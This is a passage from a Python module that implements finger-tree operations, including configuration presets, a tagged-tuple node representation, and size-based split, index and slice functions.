        may_ordered_nens=may_ordered_nens,
    )
def mk_FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
    '''Build a FingerTreeOps__setting from the individual configuration values.'''
    config = mk_NamedTuple4FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens)
    return FingerTreeOps__setting(config)
def _mk_FingerTreeOps__setting(nens, min_max_den_pair, /):
    '''Convenience constructor used for the module-level presets below.

    overflow_nen defaults to max(nens); no explicit nen ordering is supplied.
    '''
    nens = set(nens)
    # push-overflow nodes are built at the largest allowed node size
    # (the unused alias `max_nen` from the original was dropped)
    overflow_nen = max(nens)
    may_ordered_nens = None
    finger_tree_ops__setting = mk_FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens)
    return finger_tree_ops__setting
class FingerTreeOps__setting(IFingerTreeOps__setting):
    'usage:subclass<IFingerTreeOps__wrapped_setting>(finger_tree_ops__setting:FingerTreeOps__setting)'
    def __init__(sf, named_tuple4FingerTreeOps__setting:NamedTuple4FingerTreeOps__setting, /):
        check_instance(NamedTuple4FingerTreeOps__setting, named_tuple4FingerTreeOps__setting)
        sf.__config = named_tuple4FingerTreeOps__setting
        sf.__helper = Helper4cut_uint_into_uints(sf.__config.nen_set)
        may_ordered_nens = sf.__config.may_ordered_nens
        # when an explicit nen ordering is supplied it must be a permutation of nen_set
        if may_ordered_nens is not None:
            ordered_nens = may_ordered_nens
            check_tuple(ordered_nens)
            check_all(check_int_ge2, ordered_nens)
            nen_set = sf.__config.nen_set
            check_len_of(ordered_nens, sz=len(nen_set))
            if not set(ordered_nens) == nen_set: raise ValueError
        # whole-setting consistency check last, once all fields are in place
        check_finger_tree_ops__setting(sf)
    ## source from abstractmethod_decls_of_IFingerTreeOps
    @override
    def get_sorted_node_element_numbers(sf, /):
        '-> sorted tuple<uint>'
        return sf.__config.sorted_nens
    @override
    def get_node_element_number_frozenset(sf, /):
        '-> frozenset<uint>'
        return sf.__config.nen_set
    @override
    def get_min_max_digit_element_number_pair(sf, /):
        '-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
        return sf.__config.min_max_den_pair
    @override
    def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
        '-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
        return sf.__config.overflow_nen
    r'''
    Helper4cut_uint_into_uints
        possible_parts_of
        calc_lowerbound_of_inf_compact_domain_rng
        cut_uint_into_uints__greedy
        cut_uint_into_uints__greedy_last__ordered_part_uints
    #'''
    @override
    def ___split_size__case_digit_seq_digit___(sf, sz, /):
        '[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
        # delegate the whole cut to the helper (ordering hint may be None)
        may_ordered_nens = sf.__config.may_ordered_nens
        nen2count = sf.__helper.cut_uint_into_uints__greedy_last__ordered_part_uints(may_ordered_nens, sz)
        return nen2count
    @override
    def ___split_size__case_digit_seq___(sf, sz, /):
        '[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        assert min_den <= sz
        if sz <= max_den:
            # everything fits into a single digit; no nodes needed
            den = sz
            nen2count = {}
        else:
            #recur:overflow_nen = sf.get_num_child_xnode_seq_of_new_node_when_push_overflow()
            overflow_nen = sf._get_num_child_xnode_seq_of_new_node_when_push_overflow()
            # spill whole overflow-sized nodes; the divmod remainder r stays in the digit
            try_den = min_den
            tsz = sz-try_den # >max_den-min_den >= max_nen >= overflow_nen
            q, r = divmod(tsz, overflow_nen)
            den = try_den + r # <= min_den+overflow_nen-1 <= min_den+max_nen-1 <= max_den-1
            assert min_den <= den < max_den
            nen2count = {overflow_nen:q}
        return den, nen2count
    @override
    def ___split_size__case_seq___(sf, sz, /):
        '[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        assert 2*min_den <= sz
        if sz <= 2*max_den:
            # small enough: both digits together absorb everything
            den2 = sz
            nen2count = {}
        else:
            #recur:overflow_nen = sf.get_num_child_xnode_seq_of_new_node_when_push_overflow()
            overflow_nen = sf._get_num_child_xnode_seq_of_new_node_when_push_overflow()
            # den2 is the combined size of both digits; excess goes into overflow nodes
            try_den2 = 2*min_den
            tsz = sz-try_den2 # >2*(max_den-min_den) >= 2*max_nen >= 2*overflow_nen
            q, r = divmod(tsz, overflow_nen)
            den2 = try_den2 + r # <= 2*min_den+overflow_nen-1 <= 2*min_den+max_nen-1 <= min_den+max_den-1
            assert 2*min_den <= den2 < min_den+max_den
            nen2count = {overflow_nen:q}
        assert 2*min_den <= den2 <= 2*max_den
        # split the combined digit size as evenly as possible (small first)
        small_den = den2//2
        big_den = den2 - small_den
        return small_den, big_den, nen2count
#end of class FingerTreeOps__setting(IFingerTreeOps__setting):
r'''
可选方案:
0: nd<-[2,3], dg <-[1..>=4]
1: nd<-[3,4], dg <-[3..>=7]
2: nd<-[2,5], dg <-[2..>=7]
3: nd<-[3,5], dg <-[4..>=9]
4: nd<-[3,4,5], dg <-[2..>=7]
5: nd<-[4,5,6,7], dg <-[2..>=9]
nd<-[4,5,6,7], dg <-[2..10]
2..5..7..10
#'''
# Preset settings, one per candidate scheme from the r''' list above.
# Name pattern: nens joined with 'c', then min/max digit sizes as <min>T<max>,
# e.g. __2c3__1T4 <=> node sizes {2,3}, digit sizes 1..4.
finger_tree_ops__setting__2c3__1T4 \
    = _mk_FingerTreeOps__setting({2,3}, (1,4))
finger_tree_ops__setting__3c4__3T7 \
    = _mk_FingerTreeOps__setting({3,4}, (3,7))
finger_tree_ops__setting__2c5__2T7 \
    = _mk_FingerTreeOps__setting({2,5}, (2,7))
finger_tree_ops__setting__3c5__4T9 \
    = _mk_FingerTreeOps__setting({3,5}, (4,9))
finger_tree_ops__setting__3c4c5__2T7 \
    = _mk_FingerTreeOps__setting({3,4,5}, (2,7))
finger_tree_ops__setting__4c5c6c7__2T9 \
    = _mk_FingerTreeOps__setting({4,5,6,7}, (2,9))
finger_tree_ops__setting__4c5c6c7__2T10 \
    = _mk_FingerTreeOps__setting({4,5,6,7}, (2,10))
# Bare references below; presumably just mark the names as intentionally used
# (the same idiom appears elsewhere in this file).
finger_tree_ops__setting__2c3__1T4
finger_tree_ops__setting__3c4__3T7
finger_tree_ops__setting__2c5__2T7
finger_tree_ops__setting__3c5__4T9
finger_tree_ops__setting__3c4c5__2T7
finger_tree_ops__setting__4c5c6c7__2T9
finger_tree_ops__setting__4c5c6c7__2T10
class IFingerTreeOps__raw_mk_element(IFingerTreeOps):
    r'''
    @abstractmethod
    def ___mk_element__not_auto___(sf, user_obj, auto_info, /):
        'user_obj -> auto_info -> element #see:___mk_element__calc_auto_info___'
    @abstractmethod
    def ___calc_auto_info_from_user_obj___(sf, user_obj, /):
        'user_obj -> auto_info #see:calc_auto_info_from_user_obj'
    #'''
    # Layers checked element construction on top of two abstract hooks:
    # subclasses supply the raw boxing (___mk_element__not_auto___) and the
    # auto_info computation (___calc_auto_info_from_user_obj___).
    @abstractmethod
    def ___mk_element__not_auto___(sf, user_obj, auto_info, /):
        'user_obj -> auto_info -> element #see:___mk_element__calc_auto_info___'
    @override
    def ___mk_element__calc_auto_info___(sf, user_obj, /):
        'raw user_obj -> boxed element #see:mk_element'
        # derive auto_info via the checked wrapper below
        auto_info = sf.calc_auto_info_from_user_obj(user_obj)
        # call through type(sf): invokes the hook explicitly on the class
        element = type(sf).___mk_element__not_auto___(sf, user_obj, auto_info)
        sf.careless_check_element(element)
        return element
    @abstractmethod
    def ___calc_auto_info_from_user_obj___(sf, user_obj, /):
        'user_obj -> auto_info #see:calc_auto_info_from_user_obj'
    def calc_auto_info_from_user_obj(sf, user_obj, /):
        'user_obj -> auto_info #see:___calc_auto_info_from_user_obj___'
        # validate input, delegate to the abstract hook, validate output
        sf.careless_check_user_obj(user_obj)
        auto_info = type(sf).___calc_auto_info_from_user_obj___(sf, user_obj)
        sf.careless_check_auto_info(auto_info)
        return auto_info
#end of class IFingerTreeOps__raw_mk_element(IFingerTreeOps):
class IFingerTreeOps__cased_data(IFingerTreeOps__raw_mk_element):
    'except:user_obj, auto_info'
    # Representation: every boxed value is a plain tuple tagged with a case
    # name at index 0; depth-bearing cases store the depth at index 1 and the
    # auto_info in the last slot.  Layouts (lengths checked below):
    #   element   = (tag, user_obj, auto_info)                      len 3
    #   node      = (tag, depth, xnode_seq, auto_info)              len 4
    #   digit     = (tag, depth, xnode_seq, auto_info)              len 4
    #   line_tree = (tag, depth, xnode_seq, auto_info)              len 4
    #   deep_tree = (tag, depth, ldigit, mtree, rdigit, auto_info)  len 6
    case_name_of_element = 'element'
    case_name_of_node = 'node'
    case_name_of_digit = 'digit'
    case_name_of_line_tree = 'line_tree'
    case_name_of_deep_tree = 'deep_tree'
    #IFingerTreeOps__raw_mk_element
    @override
    def ___mk_element__not_auto___(sf, user_obj, auto_info, /):
        'user_obj -> auto_info -> element #see:___mk_element__calc_auto_info___'
        boxed_element = (sf.case_name_of_element, user_obj, auto_info)
        return boxed_element
    # abstractmethod_decls_of_IFingerTreeOps
    @override
    def ___get_auto_info_from_element___(sf, element, /):
        'element -> auto_info #see:get_auto_info_from_element'
        auto_info = element[-1]
        return auto_info
    @override
    def ___get_auto_info_from_node___(sf, depth, node, /):
        'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
        auto_info = node[-1]
        return auto_info
    @override
    def ___get_auto_info_from_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
        auto_info = digit[-1]
        return auto_info
    @override
    def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
        auto_info = line_tree[-1]
        return auto_info
    @override
    def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
        auto_info = deep_tree[-1]
        return auto_info
    @override
    def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
        'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
        child_xnode_seq = node[2]
        return len(child_xnode_seq)
    @override
    def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
        child_xnode_seq = digit[2]
        return len(child_xnode_seq)
    @override
    def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
        child_xnode_seq = line_tree[2]
        return len(child_xnode_seq)
    @override
    def careless_check_element(sf, element, /):
        'obj{?element} -> (None|raise)'
        check_cased_tuple(sf.case_name_of_element, 3, element)
    @override
    def ___careless_check_depth_of_node___(sf, depth, node, /):
        'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
        check_cased_tuple__with_depth(sf.case_name_of_node, 4, depth, node)
    @override
    def ___careless_check_depth_of_digit___(sf, depth, digit, /):
        'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
        check_cased_tuple__with_depth(sf.case_name_of_digit, 4, depth, digit)
    @override
    def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
        'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
        check_cased_tuple__with_depth(sf.case_name_of_line_tree, 4, depth, line_tree)
    @override
    def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
        'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
        check_cased_tuple__with_depth(sf.case_name_of_deep_tree, 6, depth, deep_tree)
    @override
    def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
        boxed_node = (sf.case_name_of_node, depth, xnode_seq, auto_info)
        return boxed_node
    @override
    def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
        boxed_digit = (sf.case_name_of_digit, depth, xnode_seq, auto_info)
        return boxed_digit
    @override
    def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
        boxed_line_tree = (sf.case_name_of_line_tree, depth, xnode_seq, auto_info)
        return boxed_line_tree
    @override
    def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
        'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
        boxed_deep_tree = (sf.case_name_of_deep_tree, depth, ldigit, mtree, rdigit, auto_info)
        return boxed_deep_tree
    @override
    def ___unbox_element___(sf, element, /):
        'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
        payload = element[1:]
        return payload
    @override
    def ___unbox_node___(sf, depth, node, /):
        'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
        payload = node[2:]
        return payload
    @override
    def ___unbox_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
        payload = digit[2:]
        return payload
    @override
    def ___unbox_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
        payload = line_tree[2:]
        return payload
    @override
    def ___unbox_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
        payload = deep_tree[2:]
        return payload
    @override
    def ___is_tree_line___(sf, depth, tree, /):
        'depth -> tree<depth> -> bool'
        # shape check first (either case), then the depth check for the
        # identified case; a line_tree answers True, a deep_tree False
        check_union_of_cased_tuples({sf.case_name_of_line_tree:4, sf.case_name_of_deep_tree:6}, tree)
        if tree[0] == sf.case_name_of_deep_tree:
            check_cased_tuple__with_depth(sf.case_name_of_deep_tree, 6, depth, tree)
            return False
        check_cased_tuple__with_depth(sf.case_name_of_line_tree, 4, depth, tree)
        return True
#end of class IFingerTreeOps__cased_data(IFingerTreeOps__raw_mk_element):
abstractmethod_decls_of_IFingerTreeOps #bare reference; presumably marks the declarations class as intentionally used
#
def check_cased_tuple__with_depth(case_name, sz, depth, obj, /):
    '''Check obj is a cased tuple of length sz storing uint depth at index 1; raise otherwise.'''
    check_int_ge2(sz)
    check_uint(depth)
    check_cased_tuple(case_name, sz, obj)
    stored_depth = obj[1]
    check_uint(stored_depth)
    if stored_depth != depth: raise TypeError
def _do_nothing(x, /):pass
class FingerTreeOps__funcs(IFingerTreeOps__cased_data, IFingerTreeOps__wrapped_setting):
    '''Concrete finger-tree ops: the auto_info machinery is supplied as plain callables.'''
    def __init__(sf, finger_tree_ops__setting:IFingerTreeOps__setting, monoid_ops4auto_info:IMonoidOps, /,*, calc_auto_info_from_user_obj, careless_check_user_obj):
        # a None checker means "accept any user_obj"
        careless_check_user_obj = _do_nothing if careless_check_user_obj is None else careless_check_user_obj
        check_instance(IMonoidOps, monoid_ops4auto_info)
        check_callable(calc_auto_info_from_user_obj)
        check_callable(careless_check_user_obj)
        sf._monoid_ops4auto_info = monoid_ops4auto_info
        sf._calc_auto_info_from_user_obj = calc_auto_info_from_user_obj
        sf._careless_check_user_obj = careless_check_user_obj
        # hand the setting itself to the base class
        super().__init__(finger_tree_ops__setting)
    @override
    def ___careless_check_auto_info___(sf, auto_info, /):
        'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
        # auto_info values are not validated here: anything is accepted
        return None
    @override
    def ___get_monoid_ops4auto_info___(sf, /):
        '-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
        return sf._monoid_ops4auto_info
    @override
    def ___calc_auto_info_from_user_obj___(sf, user_obj, /):
        'user_obj -> auto_info #see:calc_auto_info_from_user_obj'
        calc = sf._calc_auto_info_from_user_obj
        return calc(user_obj)
    @override
    def careless_check_user_obj(sf, user_obj, /):
        'obj{?user_obj} -> (None|raise)'
        checker = sf._careless_check_user_obj
        return checker(user_obj)
#end of class FingerTreeOps__funcs(IFingerTreeOps__cased_data, IFingerTreeOps__wrapped_setting):
#bug:not check_uint:::a_sized_finger_tree_ops = FingerTreeOps__funcs(finger_tree_ops__setting__2c3__1T4, the_monoid_ops4size, calc_auto_info_from_user_obj=lambda user_obj, /:1, careless_check_user_obj=check_uint)
# A ready-made size-measuring instance: every user_obj contributes 1 to the
# size monoid.  The #bug line above records why careless_check_user_obj must
# be None here (user_objs are not required to be uints).
a_sized_finger_tree_ops = FingerTreeOps__funcs(finger_tree_ops__setting__2c3__1T4, the_monoid_ops4size, calc_auto_info_from_user_obj=lambda user_obj, /:1, careless_check_user_obj=None)
if 1:
    a_sized_finger_tree_ops
    def _test__a_sized_finger_tree_ops():
        # smoke test run at import time: push one element, read it back in order
        ops = a_sized_finger_tree_ops
        empty_tree = ops.mk_empty_tree(0)
        singleton_tree = ops.ipushL__top_tree(empty_tree, 'a')
        user_objs = list(ops.iter_user_objs__tree(0, singleton_tree, reverse=False))
        assert user_objs == ['a']
    _test__a_sized_finger_tree_ops()
class IFingerTreeOps__sized(IFingerTreeOps):
    r'''Size-measured extension of IFingerTreeOps: len / index / split / slice.

    Requires the supplied measurable ops to measure auto_info into the shared
    size monoid (the_monoid_ops4size) - enforced in the getter below.
    '''
    @abstractmethod
    def ___get_measurable_ops4auto_info2size___(sf, /):
        '-> IMeasurableOps<auto_info, size> #see:get_measurable_ops4auto_info2size'
    def get_measurable_ops4auto_info2size(sf, /):
        '-> IMeasurableOps<auto_info, size> #see:___get_measurable_ops4auto_info2size___'
        measurable_ops4auto_info2size = type(sf).___get_measurable_ops4auto_info2size___(sf)
        check_instance(IMeasurableOps, measurable_ops4auto_info2size)
        monoid_ops4size = measurable_ops4auto_info2size.get_monoid_ops4measured_result()
        # identity check against the shared size monoid singleton
        if not monoid_ops4size is the_monoid_ops4size: raise ValueError #even mk_ReversedMonoidOps since commutable
        return measurable_ops4auto_info2size
    def len__tree(sf, depth, tree, /):
        'depth -> tree<depth> -> (size::uint)'
        auto_info = sf.get_auto_info_from_tree(depth, tree)
        measurable_ops4auto_info2size = sf.get_measurable_ops4auto_info2size()
        sz = measurable_ops4auto_info2size.measure(auto_info)
        check_uint(sz)
        return sz
    def len__element(sf, element, /):
        'element -> (size::uint)'
        return sf.len__xnode(0, element)#check inside
    def len__node(sf, depth, node, /):
        'depth -> node<depth> -> (size::uint)'
        check_uint(depth)
        # a node<depth> is viewed as the xnode at depth+1
        return sf.len__xnode(depth+1, node)
    def len__xnode(sf, depth, xnode, /):
        'depth -> xnode<depth-1> -> (size::uint)'
        check_uint(depth)
        auto_info = sf.get_auto_info_from_xnode(depth, xnode)
        measurable_ops4auto_info2size = sf.get_measurable_ops4auto_info2size()
        sz = measurable_ops4auto_info2size.measure(auto_info)
        check_uint(sz)
        if not depth:
            element = xnode
            # at depth 0 an xnode is a single element, which must measure as exactly 1.
            # NOTE(review): 'logic-err' (here and below) is this file's crash-marker
            # idiom - 'logic' is undefined, so hitting such a branch raises NameError.
            if not sz == 1: raise logic-err
        return sz
    def isplitL_at__tree(sf, depth, tree, i, /):
        #return (ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree)
        r'''depth -> tree<depth> -> (i::int) -> ((ltree<depth>, sz_ltree::uint, imay_offsetL_inside_mid_xnode::imay, sz_mid::uint, tmay_mid_xnode::(tmay xnode<depth-1>), rtree<depth>, mxrtree<depth>) |raise IndexError)
        [not abs(i) <= len tree] <==> [raise IndexError]
        let offsetted_i = i+sz if i < 0 else i
        output:
            ltree, sz_ltree=measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree
                see:isplitL__tree.__doc__
            imay_offsetL_inside_mid_xnode
                == offsetted_i - sz_ltree if tmay_mid_xnode else -1
                "L" means count from L to R based at end of ltree, i.e. begin of mid_xnode
            sz_mid
                == sum $ map len tmay_mid_xnode
        #'''
        #####################
        r'''old api:depth -> tree<depth> -> (i::int) -> ((ltree<depth>, rtree<depth>, ex4head_rtree::(()|(head_xnode_of_rtree::xnode<depth-1>, offsetL_inside_xnode::uint, sz_xnode::uint))) |raise IndexError)
        [not abs(i) <= len tree] <==> [raise IndexError]
        [empty rtree] <==> [() == ex4head_rtree]
        [nonempty rtree] <==> [(head rtree, idx_fromLtoR@head, len head) == ex4head_rtree]
        [tree === join(ltree, rtree)]
        [offsetted i@input === len ltree + offsetL_inside_xnode]
        [0 <= offsetL_inside_xnode < len head]
        #'''
        sz = sf.len__tree(depth, tree)
        i = offset_signed_idx_by_sz(sz, i)
        check_int(i, min=0, max=sz)
        measurable_ops4auto_info2size = sf.get_measurable_ops4auto_info2size()
        # predicate handed to isplitL__tree: a prefix measure sz is 'ok' once i < sz
        def measured_result2is_ok(sz, /):
            return i < sz
        init_sz = 0
        (ltree, sz_ltree, tmay_mid_xnode, rtree, mxrtree) = sf.isplitL__tree(depth, tree, measurable_ops4auto_info2size, init_sz, measured_result2is_ok)
        if not (sz_ltree == sf.len__tree(depth, ltree)): raise logic-err
        if tmay_mid_xnode:
            [mid_xnode] = tmay_mid_xnode
            sz_mid = sf.len__xnode(depth, mid_xnode)
            assert sz_mid > 0
            imay_offsetL_inside_mid_xnode = i - sz_ltree
        else:
            # no mid xnode: i points at the very end; -1 marks "no offset"
            sz_mid = 0
            imay_offsetL_inside_mid_xnode = -1
        sz_lmxtree = sz_ltree + sz_mid
        # postcondition checks over all returned sizes/offsets
        if not (sz_mid == 0 <= sz_ltree==i==sz_lmxtree==sz or sz_mid > 0 <= sz_ltree <= i < sz_lmxtree <= sz): raise logic-err
        if depth==0:
            if not (0 <= sz_mid <= 1): raise logic-err
            if not (0 <= sz_ltree==i <=sz): raise logic-err
        if not (-1 <= imay_offsetL_inside_mid_xnode < sz_mid): raise logic-err
        if not (-1 == imay_offsetL_inside_mid_xnode < sz_mid == 0 or 0 <= imay_offsetL_inside_mid_xnode < sz_mid): raise logic-err
        return (ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree)
        # NOTE(review): everything below is unreachable dead code - the function
        # always returns just above.  It implements the 'old api' documented in
        # the second docstring and appears to be kept only for reference.
        may = sf.may_ipopL__tree(depth, mxrtree)
        if i < sz:
            if may is None: raise logic-err
            tail_of_rtree, head_xnode_of_rtree = may
            szL = sf.len__tree(depth, ltree)
            sz_xnode = sf.len__xnode(depth, head_xnode_of_rtree)
            if not 0 <= szL <= i < szL+sz_xnode <= sz: raise logic-err
            offsetL_inside_xnode = i - szL
            if not 0 <= offsetL_inside_xnode < sz_xnode: raise logic-err
            ex4head_rtree = (head_xnode_of_rtree, offsetL_inside_xnode, sz_xnode)
        else:
            if not may is None: raise logic-err
            #ltree = tree
            #rtree = empty
            ex4head_rtree = ()
        return (ltree, rtree, ex4head_rtree)
    #end of def isplitL_at__tree(sf, depth, tree, i, /):
    def isplitR_at__tree(sf, depth, tree, i, /):
        #return (lmxtree, ltree, tmay_mid_xnode, sz_mid, imay_offsetR_inside_mid_xnode, sz_rtree, rtree)
        r'''depth -> tree<depth> -> (i::int) -> ((lmxtree<depth>, ltree<depth>, tmay_mid_xnode::(tmay xnode<depth-1>), sz_mid::uint, imay_offsetR_inside_mid_xnode::imay, sz_rtree::uint, rtree<depth>) |raise IndexError)
        [not abs(i) <= len tree] <==> [raise IndexError]
        let offsetted_i = i+sz if i < 0 else i
        output:
            lmxtree, ltree, tmay_mid_xnode, sz_rtree=measured_result_before_rtree, rtree
                see:isplitR__tree.__doc__
            imay_offsetR_inside_mid_xnode
                == offsetted_i - sz_rtree if tmay_mid_xnode else -1
                "R" means count from R to L based at begin of rtree, i.e. end of mid_xnode
            sz_mid
                == sum $ map len tmay_mid_xnode
        #'''
        #####################
        r'''old api:depth -> tree<depth> -> (i::int) -> ((ltree<depth>, rtree<depth>, ex4last_ltree::(()|(last_xnode_of_ltree::xnode<depth-1>, offsetR_inside_xnode::uint, sz_xnode::uint))) |raise IndexError)
        [not abs(i) <= len tree] <==> [raise IndexError]
        [empty ltree] <==> [() == ex4last_ltree]
        [nonempty ltree] <==> [(last ltree, idx_fromRtoL@last, len last) == ex4last_ltree]
        [tree === join(ltree, rtree)]
        [offsetted i@input === offsetR_inside_xnode + len rtree]
        [0 <= offsetR_inside_xnode < len last]
        #'''
        # delegate: split from the left in the mirrored view, then flip the result
        ops = mk_ReversedFingerTreeOps(sf)
        (rtree, sz_rtree, imay_offsetR_inside_mid_xnode, sz_mid, tmay_mid_xnode, ltree, lmxtree) = ops.isplitL_at__tree(depth, tree, i)
        #output flip here!!!
        return (lmxtree, ltree, tmay_mid_xnode, sz_mid, imay_offsetR_inside_mid_xnode, sz_rtree, rtree)
    def at__tree(sf, depth, tree, i, /):
        'depth -> tree<depth> -> (i::int) -> ((xnode<depth-1>, offsetL_inside_xnode::uint, sz_xnode::uint)|raise IndexError)'
        (ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree) = sf.isplitL_at__tree(depth, tree, i)
        # no mid xnode means i == len(tree): out of range for element access
        if not tmay_mid_xnode: raise IndexError
        [mid_xnode] = tmay_mid_xnode
        offsetL_inside_mid_xnode = imay_offsetL_inside_mid_xnode
        check_uint(offsetL_inside_mid_xnode)
        xnode = mid_xnode
        offsetL_inside_xnode = offsetL_inside_mid_xnode
        sz_xnode = sz_mid
        return (xnode, offsetL_inside_xnode, sz_xnode)
    def isplit_at__top_tree(sf, top_tree, i, /):
        'tree<depth=0> -> (i::int) -> ((ltree<depth=0>, tmay_mid_user_obj::tmay user_obj, rtree<depth=0>, mxrtree<depth=0>) |raise IndexError)'
        'old api:tree<depth=0> -> (i::int) -> ((ltree<depth=0>, rtree<depth=0>, tmay_head_user_obj_of_rtree) |raise IndexError)'
        depth = 0
        (ltree, sz_ltree, imay_offsetL_inside_mid_xnode, sz_mid, tmay_mid_xnode, rtree, mxrtree) = sf.isplitL_at__tree(depth, top_tree, i)
        #may raise IndexError inside
        if not tmay_mid_xnode:
            () = tmay_mid_xnode
            if not -1 == imay_offsetL_inside_mid_xnode < sz_mid == 0: raise logic-err
            tmay_mid_user_obj = ()
        else:
            # at depth 0 the mid xnode is a single element: unbox the user_obj
            (mid_xnode,) = tmay_mid_xnode
            if not 0 == imay_offsetL_inside_mid_xnode < sz_mid == 1: raise logic-err
            element = mid_xnode
            user_obj, auto_info = sf.unbox_element(element)
            mid_user_obj = user_obj
            tmay_mid_user_obj = (mid_user_obj,)
        tmay_mid_user_obj
        return (ltree, tmay_mid_user_obj, rtree, mxrtree)
    def at__top_tree(sf, top_tree, i, /):
        'tree<depth=0> -> (i::int) -> (user_obj|raise IndexError)'
        # 'if 1:' selects the first implementation; the else branch is a kept
        # alternative via at__tree and is never executed
        if 1:
            (ltree, tmay_mid_user_obj, rtree, mxrtree) = sf.isplit_at__top_tree(top_tree, i)
            if not tmay_mid_user_obj: raise IndexError
            [user_obj] = tmay_mid_user_obj
        else:
            depth = 0
            (xnode, offsetL_inside_xnode, sz_xnode) = sf.at__tree(depth, top_tree, i)
            element = xnode
            if not 0 == offsetL_inside_xnode < sz_xnode == 1: raise logic-err
            user_obj, auto_info = sf.unbox_element(element)
        return user_obj
    def slice__top_tree(sf, top_tree, begin, end, /):
        'tree<depth=0> -> (begin::may int) -> (end::may int) -> (tree<depth=0>|raise IndexError)'
        depth = 0
        sz = sf.len__tree(depth, top_tree)
        (begin, end) = offset_may_signed_rng_by_sz(sz, begin, end)
        if end <= begin:
            empty_tree = sf.mk_empty_tree(depth)
            new_tree = empty_tree
        else:
            # cut off everything at/after end, then split the kept prefix at begin;
            # mxrtreeL presumably rejoins the mid element with the right part,
            # yielding [begin, end) - TODO confirm against isplitL__tree's contract
            ltree, _tm_mid, _rtree, _mxrtree = sf.isplit_at__top_tree(top_tree, end)
            _ltreeL, _tm_midL, _rtreeL, mxrtreeL = sf.isplit_at__top_tree(ltree, begin)
            new_tree = mxrtreeL
        return new_tree
#end of class IFingerTreeOps__sized(IFingerTreeOps):
def offset_may_signed_rng_by_sz(sz, begin, end, /):
    '''Normalize an optional signed (begin, end) range against size sz; None means the full extent.'''
    begin = 0 if begin is None else begin
    end = sz if end is None else end
    return (offset_signed_idx_by_sz(sz, begin), offset_signed_idx_by_sz(sz, end))
def offset_signed_idx_by_sz(sz, idx, /):
    '''Normalize a signed index against size sz into 0..sz inclusive; raise IndexError if out of range.'''
    check_int(idx)
    check_uint(sz)
    if not (-sz <= idx <= sz): raise IndexError
    offsetted_idx = idx + sz if idx < 0 else idx
    check_int(offsetted_idx, min=0, max=sz)
    return offsetted_idx
class IFingerTreeOps__max_priority(IFingerTreeOps):
    # max-priority-measured variant; the query operations are still TODO (see below)
    @abstractmethod
    def ___get_measurable_ops4auto_info2max_priority___(sf, /):
        '-> IMeasurableOps<auto_info, max_priority> #see:get_measurable_ops4auto_info2max_priority'
    def get_measurable_ops4auto_info2max_priority(sf, /):
        '-> IMeasurableOps<auto_info, max_priority> #see:___get_measurable_ops4auto_info2max_priority___'
        measurable_ops = type(sf).___get_measurable_ops4auto_info2max_priority___(sf)
        check_instance(IMeasurableOps, measurable_ops)
        monoid_ops = measurable_ops.get_monoid_ops4measured_result()
